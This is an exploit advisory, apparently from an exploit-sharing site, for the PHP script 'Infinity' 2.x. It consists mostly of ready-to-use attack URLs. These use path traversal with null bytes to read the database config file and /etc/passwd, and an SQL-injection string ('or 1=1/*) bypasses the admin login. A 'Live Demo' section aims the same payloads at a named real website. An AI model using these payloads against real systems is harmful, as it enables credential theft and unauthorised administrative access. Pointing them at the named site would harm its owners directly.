Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability

========================================================================
Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability
========================================================================


#----------------------------------------------------------------------------------------------------------------
Script : Infinity
version : 2.X.X
Language: PHP
Site: http://www.dimofinf.net/
Author: SwEET-DeViL

need magic_quotes_gpc = Off  <-----(<>

----------------------------------------------------------------------------------------------------------------

- +[LFD]

#Exploit:

http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00
http://WWW.Site.Com/inf/?options[style_dir]=../../../../../../etc/passwd%00
#
###
#
#----------------------------------------------------------------------------------------------------------------
- +[AB]

http://WWW.Site.Com/inf/cp


#Exploit:


username : 'or 1=1/*

password : SwEET-DeViL

#----------------------------------------------------------------------------------------------------------------
#
###
#
- - +[Live Demo] : >

http://www.alihammadi.com/html/?options[style_dir]=../include/db.php%00
http://www.alihammadi.com/html/?options[style_dir]=../../../../../../etc/named.conf%00





#  0day.today [2018-01-01]  #